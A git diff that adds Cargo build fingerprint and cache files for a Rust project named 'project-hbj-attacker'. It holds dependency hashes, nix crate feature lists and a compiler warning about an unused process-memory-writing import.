+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-436eee196b17bbd6/lib-nix.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\", \"process\", \"ptrace\", \"uio\"]","declared_features":"[\"acct\", \"aio\", \"default\", \"dir\", \"env\", \"event\", \"fanotify\", \"feature\", \"fs\", \"hostname\", \"inotify\", \"ioctl\", \"kmod\", \"memoffset\", \"mman\", \"mount\", \"mqueue\", \"net\", \"personality\", \"pin-utils\", \"poll\", \"process\", \"pthread\", \"ptrace\", \"quota\", \"reboot\", \"resource\", \"sched\", \"signal\", \"socket\", \"syslog\", \"term\", \"time\", \"ucontext\", \"uio\", \"user\", \"zerocopy\"]","target":1600181213338542824,"profile":2241668132362809309,"path":17896847802790571066,"deps":[[5150833351789356492,"build_script_build",false,13400472904926905381],[7667230146095136825,"cfg_if",false,16864651187190583499],[9001817693037665195,"bitflags",false,4230325144736591251],[11499138078358568213,"libc",false,1099485397091021021]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/nix-436eee196b17bbd6/dep-lib-nix","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-4bd4a1f74f0bb075/run-build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/nix-4bd4a1f74f0bb075/run-build-script-build-script-build
new file mode 100644
index 0000000..42bd6db
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-4bd4a1f74f0bb075/run-build-script-build-script-build
@@ -0,0 +1 @@
+14165489036d72ed
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-4bd4a1f74f0bb075/run-build-script-build-script-build.json b/01/project-hbj-attacker/target/debug/.fingerprint/nix-4bd4a1f74f0bb075/run-build-script-build-script-build.json
new file mode 100644
index 0000000..6339d42
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-4bd4a1f74f0bb075/run-build-script-build-script-build.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"","declared_features":"","target":0,"profile":0,"path":0,"deps":[[5150833351789356492,"build_script_build",false,11609280506767278555]],"local":[{"Precalculated":"0.30.1"}],"rustflags":[],"config":0,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-67a07a9a08f386cd/build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/nix-67a07a9a08f386cd/build-script-build-script-build
new file mode 100644
index 0000000..6b749b1
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-67a07a9a08f386cd/build-script-build-script-build
@@ -0,0 +1 @@
+db01bbbf1c731ca1
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-67a07a9a08f386cd/build-script-build-script-build.json b/01/project-hbj-attacker/target/debug/.fingerprint/nix-67a07a9a08f386cd/build-script-build-script-build.json
new file mode 100644
index 0000000..cad36fd
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-67a07a9a08f386cd/build-script-build-script-build.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\"]","declared_features":"[\"acct\", \"aio\", \"default\", \"dir\", \"env\", \"event\", \"fanotify\", \"feature\", \"fs\", \"hostname\", \"inotify\", \"ioctl\", \"kmod\", \"memoffset\", \"mman\", \"mount\", \"mqueue\", \"net\", \"personality\", \"pin-utils\", \"poll\", \"process\", \"pthread\", \"ptrace\", \"quota\", \"reboot\", \"resource\", \"sched\", \"signal\", \"socket\", \"syslog\", \"term\", \"time\", \"ucontext\", \"uio\", \"user\", \"zerocopy\"]","target":5408242616063297496,"profile":2225463790103693989,"path":16873847496812488938,"deps":[[1884099982326826527,"cfg_aliases",false,11900585525974625930]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/nix-67a07a9a08f386cd/dep-build-script-build-script-build","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-67a07a9a08f386cd/dep-build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/nix-67a07a9a08f386cd/dep-build-script-build-script-build
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/nix-67a07a9a08f386cd/dep-build-script-build-script-build differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-67a07a9a08f386cd/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/nix-67a07a9a08f386cd/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-67a07a9a08f386cd/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-bfbd0f7d1e241912/run-build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/nix-bfbd0f7d1e241912/run-build-script-build-script-build
new file mode 100644
index 0000000..5ae31f5
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-bfbd0f7d1e241912/run-build-script-build-script-build
@@ -0,0 +1 @@
+53a65092b02db9b8
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-bfbd0f7d1e241912/run-build-script-build-script-build.json b/01/project-hbj-attacker/target/debug/.fingerprint/nix-bfbd0f7d1e241912/run-build-script-build-script-build.json
new file mode 100644
index 0000000..2e32c43
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-bfbd0f7d1e241912/run-build-script-build-script-build.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"","declared_features":"","target":0,"profile":0,"path":0,"deps":[[5150833351789356492,"build_script_build",false,13230753946343487988]],"local":[{"Precalculated":"0.30.1"}],"rustflags":[],"config":0,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-e02e9f067f5ef79a/run-build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/nix-e02e9f067f5ef79a/run-build-script-build-script-build
new file mode 100644
index 0000000..b183ee2
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-e02e9f067f5ef79a/run-build-script-build-script-build
@@ -0,0 +1 @@
+25446ab81b0bf8b9
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-e02e9f067f5ef79a/run-build-script-build-script-build.json b/01/project-hbj-attacker/target/debug/.fingerprint/nix-e02e9f067f5ef79a/run-build-script-build-script-build.json
new file mode 100644
index 0000000..52617c3
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-e02e9f067f5ef79a/run-build-script-build-script-build.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"","declared_features":"","target":0,"profile":0,"path":0,"deps":[[5150833351789356492,"build_script_build",false,4028823715362879090]],"local":[{"Precalculated":"0.30.1"}],"rustflags":[],"config":0,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-eafb603039cb05f6/dep-lib-nix b/01/project-hbj-attacker/target/debug/.fingerprint/nix-eafb603039cb05f6/dep-lib-nix
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/nix-eafb603039cb05f6/dep-lib-nix differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-eafb603039cb05f6/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/nix-eafb603039cb05f6/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-eafb603039cb05f6/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-eafb603039cb05f6/lib-nix b/01/project-hbj-attacker/target/debug/.fingerprint/nix-eafb603039cb05f6/lib-nix
new file mode 100644
index 0000000..cbee687
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-eafb603039cb05f6/lib-nix
@@ -0,0 +1 @@
+73f6165ac3343a09
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-eafb603039cb05f6/lib-nix.json b/01/project-hbj-attacker/target/debug/.fingerprint/nix-eafb603039cb05f6/lib-nix.json
new file mode 100644
index 0000000..29a3a58
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-eafb603039cb05f6/lib-nix.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\"]","declared_features":"[\"acct\", \"aio\", \"default\", \"dir\", \"env\", \"event\", \"fanotify\", \"feature\", \"fs\", \"hostname\", \"inotify\", \"ioctl\", \"kmod\", \"memoffset\", \"mman\", \"mount\", \"mqueue\", \"net\", \"personality\", \"pin-utils\", \"poll\", \"process\", \"pthread\", \"ptrace\", \"quota\", \"reboot\", \"resource\", \"sched\", \"signal\", \"socket\", \"syslog\", \"term\", \"time\", \"ucontext\", \"uio\", \"user\", \"zerocopy\"]","target":1600181213338542824,"profile":2241668132362809309,"path":17896847802790571066,"deps":[[5150833351789356492,"build_script_build",false,17109857796290254356],[7667230146095136825,"cfg_if",false,16864651187190583499],[9001817693037665195,"bitflags",false,4230325144736591251],[11499138078358568213,"libc",false,1099485397091021021]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/nix-eafb603039cb05f6/dep-lib-nix","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-f409c0380beaaf14/build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/nix-f409c0380beaaf14/build-script-build-script-build
new file mode 100644
index 0000000..d163e63
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-f409c0380beaaf14/build-script-build-script-build
@@ -0,0 +1 @@
+f4b9665a9d149db7
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-f409c0380beaaf14/build-script-build-script-build.json b/01/project-hbj-attacker/target/debug/.fingerprint/nix-f409c0380beaaf14/build-script-build-script-build.json
new file mode 100644
index 0000000..a5facec
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-f409c0380beaaf14/build-script-build-script-build.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\", \"process\", \"ptrace\"]","declared_features":"[\"acct\", \"aio\", \"default\", \"dir\", \"env\", \"event\", \"fanotify\", \"feature\", \"fs\", \"hostname\", \"inotify\", \"ioctl\", \"kmod\", \"memoffset\", \"mman\", \"mount\", \"mqueue\", \"net\", \"personality\", \"pin-utils\", \"poll\", \"process\", \"pthread\", \"ptrace\", \"quota\", \"reboot\", \"resource\", \"sched\", \"signal\", \"socket\", \"syslog\", \"term\", \"time\", \"ucontext\", \"uio\", \"user\", \"zerocopy\"]","target":5408242616063297496,"profile":2225463790103693989,"path":16873847496812488938,"deps":[[1884099982326826527,"cfg_aliases",false,11900585525974625930]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/nix-f409c0380beaaf14/dep-build-script-build-script-build","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-f409c0380beaaf14/dep-build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/nix-f409c0380beaaf14/dep-build-script-build-script-build
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/nix-f409c0380beaaf14/dep-build-script-build-script-build differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-f409c0380beaaf14/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/nix-f409c0380beaaf14/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-f409c0380beaaf14/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-f71316321b63dde7/dep-lib-nix b/01/project-hbj-attacker/target/debug/.fingerprint/nix-f71316321b63dde7/dep-lib-nix
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/nix-f71316321b63dde7/dep-lib-nix differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-f71316321b63dde7/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/nix-f71316321b63dde7/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-f71316321b63dde7/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-f71316321b63dde7/lib-nix b/01/project-hbj-attacker/target/debug/.fingerprint/nix-f71316321b63dde7/lib-nix
new file mode 100644
index 0000000..c6c5c6c
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-f71316321b63dde7/lib-nix
@@ -0,0 +1 @@
+3106149b77fbea34
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/nix-f71316321b63dde7/lib-nix.json b/01/project-hbj-attacker/target/debug/.fingerprint/nix-f71316321b63dde7/lib-nix.json
new file mode 100644
index 0000000..f288f75
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/nix-f71316321b63dde7/lib-nix.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\", \"process\", \"ptrace\"]","declared_features":"[\"acct\", \"aio\", \"default\", \"dir\", \"env\", \"event\", \"fanotify\", \"feature\", \"fs\", \"hostname\", \"inotify\", \"ioctl\", \"kmod\", \"memoffset\", \"mman\", \"mount\", \"mqueue\", \"net\", \"personality\", \"pin-utils\", \"poll\", \"process\", \"pthread\", \"ptrace\", \"quota\", \"reboot\", \"resource\", \"sched\", \"signal\", \"socket\", \"syslog\", \"term\", \"time\", \"ucontext\", \"uio\", \"user\", \"zerocopy\"]","target":1600181213338542824,"profile":2241668132362809309,"path":17896847802790571066,"deps":[[5150833351789356492,"build_script_build",false,13310720410062464595],[7667230146095136825,"cfg_if",false,16864651187190583499],[9001817693037665195,"bitflags",false,4230325144736591251],[11499138078358568213,"libc",false,1099485397091021021]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/nix-f71316321b63dde7/dep-lib-nix","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error-attr2-eaefd73d796b2801/dep-lib-proc_macro_error_attr2 b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error-attr2-eaefd73d796b2801/dep-lib-proc_macro_error_attr2
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error-attr2-eaefd73d796b2801/dep-lib-proc_macro_error_attr2 differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error-attr2-eaefd73d796b2801/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error-attr2-eaefd73d796b2801/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error-attr2-eaefd73d796b2801/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error-attr2-eaefd73d796b2801/lib-proc_macro_error_attr2 b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error-attr2-eaefd73d796b2801/lib-proc_macro_error_attr2
new file mode 100644
index 0000000..6643fe0
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error-attr2-eaefd73d796b2801/lib-proc_macro_error_attr2
@@ -0,0 +1 @@
+56849a1fd3da21cb
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error-attr2-eaefd73d796b2801/lib-proc_macro_error_attr2.json b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error-attr2-eaefd73d796b2801/lib-proc_macro_error_attr2.json
new file mode 100644
index 0000000..37a5935
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error-attr2-eaefd73d796b2801/lib-proc_macro_error_attr2.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":7232681507489449153,"profile":2995957552370660634,"path":14850667860966041758,"deps":[[373107762698212489,"proc_macro2",false,18418728764669633043],[11082282709338087849,"quote",false,13751178957886922814]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/proc-macro-error-attr2-eaefd73d796b2801/dep-lib-proc_macro_error_attr2","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error2-55e4f1d46a8a5c63/dep-lib-proc_macro_error2 b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error2-55e4f1d46a8a5c63/dep-lib-proc_macro_error2
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error2-55e4f1d46a8a5c63/dep-lib-proc_macro_error2 differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error2-55e4f1d46a8a5c63/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error2-55e4f1d46a8a5c63/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error2-55e4f1d46a8a5c63/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error2-55e4f1d46a8a5c63/lib-proc_macro_error2 b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error2-55e4f1d46a8a5c63/lib-proc_macro_error2
new file mode 100644
index 0000000..2580d50
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error2-55e4f1d46a8a5c63/lib-proc_macro_error2
@@ -0,0 +1 @@
+98d3874993e03f93
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error2-55e4f1d46a8a5c63/lib-proc_macro_error2.json b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error2-55e4f1d46a8a5c63/lib-proc_macro_error2.json
new file mode 100644
index 0000000..c46bd59
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro-error2-55e4f1d46a8a5c63/lib-proc_macro_error2.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\", \"syn-error\"]","declared_features":"[\"default\", \"nightly\", \"syn-error\"]","target":10198359499485127680,"profile":4181551456753360521,"path":5691904096070530447,"deps":[[373107762698212489,"proc_macro2",false,18418728764669633043],[9308116640629608885,"proc_macro_error_attr2",false,14637220864233997398],[11004406779467019477,"syn",false,17054757467241875575],[11082282709338087849,"quote",false,13751178957886922814]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/proc-macro-error2-55e4f1d46a8a5c63/dep-lib-proc_macro_error2","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-0225ebeb9d18aa18/dep-lib-proc_macro2 b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-0225ebeb9d18aa18/dep-lib-proc_macro2
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-0225ebeb9d18aa18/dep-lib-proc_macro2 differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-0225ebeb9d18aa18/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-0225ebeb9d18aa18/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-0225ebeb9d18aa18/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-0225ebeb9d18aa18/lib-proc_macro2 b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-0225ebeb9d18aa18/lib-proc_macro2
new file mode 100644
index 0000000..5675b59
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-0225ebeb9d18aa18/lib-proc_macro2
@@ -0,0 +1 @@
+1322679039789cff
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-0225ebeb9d18aa18/lib-proc_macro2.json b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-0225ebeb9d18aa18/lib-proc_macro2.json
new file mode 100644
index 0000000..0d845cd
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-0225ebeb9d18aa18/lib-proc_macro2.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\", \"proc-macro\"]","declared_features":"[\"default\", \"nightly\", \"proc-macro\", \"span-locations\"]","target":369203346396300798,"profile":2225463790103693989,"path":2809775338392760423,"deps":[[373107762698212489,"build_script_build",false,12158753431416692455],[3583063304925099847,"unicode_ident",false,11295519160116602642]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/proc-macro2-0225ebeb9d18aa18/dep-lib-proc_macro2","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-98c49a84dbf4e8cc/run-build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-98c49a84dbf4e8cc/run-build-script-build-script-build
new file mode 100644
index 0000000..a86ee3d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-98c49a84dbf4e8cc/run-build-script-build-script-build
@@ -0,0 +1 @@
+e75e2777d391bca8
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-98c49a84dbf4e8cc/run-build-script-build-script-build.json b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-98c49a84dbf4e8cc/run-build-script-build-script-build.json
new file mode 100644
index 0000000..595805f
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-98c49a84dbf4e8cc/run-build-script-build-script-build.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"","declared_features":"","target":0,"profile":0,"path":0,"deps":[[373107762698212489,"build_script_build",false,9971685886248782515]],"local":[{"RerunIfChanged":{"output":"debug/build/proc-macro2-98c49a84dbf4e8cc/output","paths":["src/probe/proc_macro_span.rs","src/probe/proc_macro_span_location.rs","src/probe/proc_macro_span_file.rs"]}},{"RerunIfEnvChanged":{"var":"RUSTC_BOOTSTRAP","val":null}}],"rustflags":[],"config":0,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-aa66788d6c54b9fa/build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-aa66788d6c54b9fa/build-script-build-script-build
new file mode 100644
index 0000000..4a5fee9
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-aa66788d6c54b9fa/build-script-build-script-build
@@ -0,0 +1 @@
+b38aa2357b8b628a
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-aa66788d6c54b9fa/build-script-build-script-build.json b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-aa66788d6c54b9fa/build-script-build-script-build.json
new file mode 100644
index 0000000..6881e09
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-aa66788d6c54b9fa/build-script-build-script-build.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[\"default\", \"proc-macro\"]","declared_features":"[\"default\", \"nightly\", \"proc-macro\", \"span-locations\"]","target":5408242616063297496,"profile":2225463790103693989,"path":2497979550079206229,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/proc-macro2-aa66788d6c54b9fa/dep-build-script-build-script-build","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-aa66788d6c54b9fa/dep-build-script-build-script-build b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-aa66788d6c54b9fa/dep-build-script-build-script-build
new file mode 100644
index 0000000..ec3cb8b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-aa66788d6c54b9fa/dep-build-script-build-script-build differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-aa66788d6c54b9fa/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-aa66788d6c54b9fa/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/proc-macro2-aa66788d6c54b9fa/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-03476cb36fbc5238/dep-test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-03476cb36fbc5238/dep-test-bin-project-hbj-attacker
new file mode 100644
index 0000000..8d20231
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-03476cb36fbc5238/dep-test-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-03476cb36fbc5238/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-03476cb36fbc5238/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-03476cb36fbc5238/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-03476cb36fbc5238/output-test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-03476cb36fbc5238/output-test-bin-project-hbj-attacker
new file mode 100644
index 0000000..457216e
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-03476cb36fbc5238/output-test-bin-project-hbj-attacker
@@ -0,0 +1,5 @@
+{"$message_type":"diagnostic","message":"unused import: `processes::write_memory_vm`","code":{"code":"unused_imports","explanation":null},"level":"warning","spans":[{"file_name":"src/helper.rs","byte_start":138,"byte_end":164,"line_start":7,"line_end":7,"column_start":9,"column_end":35,"is_primary":true,"text":[{"text":"pub use processes::write_memory_vm;","highlight_start":9,"highlight_end":35}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_imports)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"remove the whole `use` item","code":null,"level":"help","spans":[{"file_name":"src/helper.rs","byte_start":130,"byte_end":166,"line_start":7,"line_end":8,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"pub use processes::write_memory_vm;","highlight_start":1,"highlight_end":36},{"text":"pub use processes::write_memory_ptrace;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"","suggestion_applicability":"MachineApplicable","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused import: `processes::write_memory_vm`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper.rs:7:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m7\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mpub use processes::write_memory_vm;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^^^^^^^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_imports)]` on by default\u001b[0m\n\n"}
